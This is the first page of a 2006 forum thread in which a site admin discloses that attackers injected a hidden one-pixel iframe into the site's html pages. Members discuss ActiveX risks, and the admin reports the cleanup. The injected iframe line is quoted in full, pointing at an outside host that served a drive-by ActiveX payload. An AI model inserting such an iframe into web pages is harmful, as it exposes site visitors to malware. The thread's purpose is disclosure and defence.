Page 1 of 2 12 LastLast
Results 1 to 15 of 30

Thread: Important Security Issue - Hacking Attack

  1. #1

    Default Important Security Issue - Hacking Attack

    I have discovered this morning that there was a hacking attack on Wired New York.

    It seems that the attack occurred on 11/22/06 at 8:36 am.

    As a result, the following code was added to all html pages (but not forum pages):
    <iframe src="http://constellations.ws/counter.php" width=1 height=1 frameborder=0 scrolling=NO></iframe>
    Apparently the code tries to load an ActiveX control in Internet Explorer. Users of Firefox are not affected by this issue.

    Firefox does not run ActiveX controls, Internet Explorer version 7 requests your permission to run the ActiveX control, and IE6 - I am not sure, probably depends on your security settings. If you allow the ActiveX control to run, your computer might be infected by a virus (that is if do not have anti-virus software installed).

    I am currently in touch with the server host and vBulletin support, trying to understand how the attack happened and what is the appropriate response.

    As of this moment, Wired New York pages still contain the malicious code. The forum pages are not affected. If you view Wired New York pages, either use Firefox, or if you are using IE make sure your security settings do not allow the ActiveX control to run automatically.

    I will issue updates about any new developments in this situation.

  2. #2
    Disgruntled Optimist lofter1's Avatar
    Join Date
    Jun 2005
    Location
    NYC - Downtown
    Posts
    32,654

    Default

    I had noticed this ^^^ at the top of the page when clicking into the forum ...

    Never activated it ... hope it will be gone before too long.

  3. #3
    Chief Antagonist Ninjahedge's Avatar
    Join Date
    Sep 2003
    Location
    Rutherford
    Posts
    12,781

    Exclamation

    Had me worried for a bit, but I am a forum-er not a page-er...


    Hope you are able to trace this and how it got on the site!!!!

  4. #4
    Banned Member
    Join Date
    Dec 2002
    Location
    Park Slope, Brooklyn, NY
    Posts
    8,113

    Default

    Can some explain what the threat is and what impact it has on our computers?

    Also, can someone more educated than I in IE tell me what the custom IE Security setting should be for Active X if this is a threat?

  5. #5

    Default

    I think with default settings for IE it will prompt you to install the ActiveX control when you visit a Wired New York page. If you decline (as you should in all cases when you do not know the purpose) then you will be fine. If you agree, the control will try to infect your computer with some sort of virus (which might be prevented by your anti-virus program).

  6. #6
    Disgruntled Optimist lofter1's Avatar
    Join Date
    Jun 2005
    Location
    NYC - Downtown
    Posts
    32,654

    Default

    Another question on this topic from a dense non-techie ...

    Other sites sometimes show that same "Click here to activate the ActiveX Control" bar message.

    Is that a sign of a hack? And is it always wise NOT to click that?

  7. #7

    Default

    It is not necessarily a sign of a hack, there are legitimate applications, however, it is always wise not to click if you do not know the purpose. If a site explains to you why this is needed and you indeed need it and you trust the site, then you can install it.

  8. #8
    Forum Veteran macreator's Avatar
    Join Date
    Feb 2005
    Location
    East Midtown
    Posts
    1,398

    Default

    Thanks for the notice, Edward. I'll be sure to make sure IE on my PC doesn't automatically run ActiveX. Luckily I mainly use my Mac to access the site.

  9. #9

    Default

    So I imagine this has no affect at all on Mac computers. True?

  10. #10

    Default

    Quote Originally Posted by Fabrizio View Post
    So I imagine this has no affect at all on Mac computers. True?
    That's correct, Fabrizio. This has no effect on Macintosh systems at all.

  11. #11

    Default

    I cleaned the site the same day, 8 Dec 06, but it's still worth reminding not to allow installation of ActiveX when you are not sure of the purpose, and also please report to me any unusual behaviour.

  12. #12
    Build the Tower Verre antinimby's Avatar
    Join Date
    Sep 2004
    Location
    in Limbo
    Posts
    8,976

    Default

    Damn hackers.

  13. #13
    Disgruntled Optimist lofter1's Avatar
    Join Date
    Jun 2005
    Location
    NYC - Downtown
    Posts
    32,654

    Default

    Since you "cleaned" it I've run into no problems -- but was experiencing some aggravating freezes / slow loading between 11/22 <> 12/8 (so I probably stupidly clicked something I shouldn't have during that time and gummed myself up).

  14. #14

    Default Slow Site?

    I hate to whine about something relatively trivial like this, but has anyone else noticed the site has been slow in recent days? Alexa shows that traffic has been about as slow as it's gotten this year, so it can't be that.

  15. #15

    Default

    thanx for noticing us, i,ll take care ..

Page 1 of 2 12 LastLast

Similar Threads

  1. Unfair Share of Security Money
    By Kris in forum News and Politics
    Replies: 112
    Last Post: July 7th, 2007, 05:58 PM
  2. Does Anyone Important Read these Forums?
    By ablarc in forum Social Club
    Replies: 15
    Last Post: June 25th, 2003, 06:49 PM
  3. Brooklyn Bridge Attack-proof
    By Kris in forum New York City Guide For New Yorkers
    Replies: 1
    Last Post: June 21st, 2003, 03:51 AM
  4. NYNV responds - Or why is the Tour Bus issue such a big deal
    By dbhstockton in forum New York Skyscrapers and Architecture
    Replies: 11
    Last Post: March 6th, 2003, 12:18 AM
  5. Not Even Terror Attack Dims Manhattan Market
    By Edward in forum New York Real Estate
    Replies: 1
    Last Post: February 2nd, 2002, 08:50 AM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  


Google+ - Facebook - Twitter - Meetup

Edward's photos on Flickr - Wired New York on Flickr - In Queens - In Red Hook - Bryant Park - SQL Backup Software